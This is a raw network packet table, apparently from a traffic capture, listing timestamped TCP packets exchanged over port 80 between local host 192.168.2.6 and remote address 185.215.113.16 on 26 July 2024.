Jul 26, 2024 12:57:04.955420971 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.956516027 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.956526995 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.956545115 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.956556082 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.956568003 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.956572056 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.956583977 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.956608057 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.957206011 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.957216978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.957235098 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.957243919 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.957247972 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.957257032 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.957269907 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.959681034 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.959692001 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.959709883 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.959719896 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.959726095 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.959747076 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.959760904 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.960506916 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.960517883 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.960536003 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.960545063 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.960551023 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.960560083 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.960565090 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.960570097 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.960593939 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.960593939 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.961271048 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.961282015 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.961301088 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.961312056 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.961313963 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.961323977 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.961329937 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.961334944 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.961353064 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.961361885 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.973548889 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.973603010 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.973696947 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.973706961 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.973836899 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.974128008 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.974174023 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.974185944 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.974196911 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.974215031 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.974225044 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.974237919 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.974250078 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.976346016 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.976356030 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.976372957 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.976383924 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.976401091 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.976424932 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.979949951 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.979960918 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.979979038 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.979989052 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.980000973 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.980000973 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.980010986 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.980035067 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.980906963 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.980916977 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.980933905 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.980942965 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.980951071 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.980971098 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.980986118 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.030337095 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.030354977 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.030579090 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.030597925 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.030633926 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.030692101 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.030771017 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.030781031 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.030791044 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.030810118 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.030893087 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.031296968 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.031307936 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.031327009 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.031336069 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.031346083 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.031363010 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.031377077 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.032418966 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.032430887 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.032444000 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.032459021 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.032466888 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.032470942 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.032500029 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.032500029 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.032500029 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.032510996 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.033261061 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.033286095 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.033303022 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.033313990 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.033320904 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.033339977 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.033354998 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.034301996 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.034313917 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.034332037 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.034342051 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.034343958 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.034353018 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.034358978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.034364939 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.034378052 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.034390926 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.035316944 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.035330057 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.035342932 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.035355091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.035357952 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.035381079 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.035393000 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.036204100 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.036215067 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.036232948 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.036242008 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.036251068 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.036261082 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.036267996 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.036288977 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.036302090 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.037200928 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.037211895 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.037230015 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.037237883 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.037247896 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.037260056 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.037282944 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.037998915 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.038009882 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.038026094 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.038036108 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.038048029 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.038053036 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.038067102 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.038075924 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.038085938 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.038113117 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.038985968 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.038996935 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.039016962 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.039026022 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.039033890 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.039041996 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.039043903 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.039066076 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.039088011 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.040003061 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.040014029 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.040030003 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.040040016 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.040056944 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.040056944 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.040070057 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.040075064 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.040090084 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.040112972 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.040966034 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.040977001 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.040992022 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.041004896 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.041013002 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.041017056 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.041030884 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.041030884 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.041057110 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.041961908 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.041973114 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.041990042 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.042000055 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.042006016 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.042017937 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.042026997 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.042027950 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.042049885 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.042076111 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.042942047 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.042952061 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.042968035 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.042978048 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.042987108 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.042994976 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.043010950 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.043037891 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.088104963 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.088316917 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.088365078 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.088392019 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.088402033 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.088411093 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.088423967 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.088429928 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.088448048 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.088454962 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.088676929 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.088687897 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.088726997 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.089056969 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.089066982 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.089085102 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.089095116 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.089145899 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.089200020 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.089874029 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.089891911 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.089907885 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.089916945 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.089922905 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.089946032 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.089968920 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.090679884 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.090692043 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.090708971 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.090718985 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.090724945 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.090748072 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.090763092 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.091187000 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.091197014 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.091213942 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.091223001 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.091228962 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.091239929 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.091255903 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.092015982 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.092027903 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.092045069 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.092053890 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.092063904 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.092071056 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.092081070 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.092103958 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.092117071 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.092863083 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.092873096 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.092889071 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.092900038 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.092906952 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.092927933 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.092941999 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.094430923 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.094441891 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.094454050 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.094463110 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.094474077 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.094480991 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.094482899 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.094491959 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.094504118 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.094516039 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.094535112 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.094562054 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.094573975 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.094595909 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.094608068 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.094629049 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.123553991 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.123593092 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.123616934 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.123640060 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.123759031 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.123759031 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.123759031 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.123759985 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.123899937 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.123922110 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.123934031 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.123950958 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.124062061 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.124063015 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.124063015 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.124268055 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.124289036 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.124305010 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.124314070 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.124407053 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.124407053 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.124407053 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.125088930 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.125098944 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.125118017 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.125135899 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.125152111 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.125550985 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.125560045 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.125576973 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.125585079 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.125598907 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.125633001 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.126240015 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.126250029 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.126266956 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.126276016 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.126286030 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.126321077 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.127054930 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.127065897 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.127082109 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.127091885 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.127104044 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.127115965 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.127144098 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.127883911 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.127893925 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.127911091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.127921104 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.127932072 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.127939939 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.127957106 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.127974987 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.128771067 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.128782034 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.128793955 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.128804922 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.128818989 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.128846884 CEST	60778	80	192.168.2.6	185.215.113.16
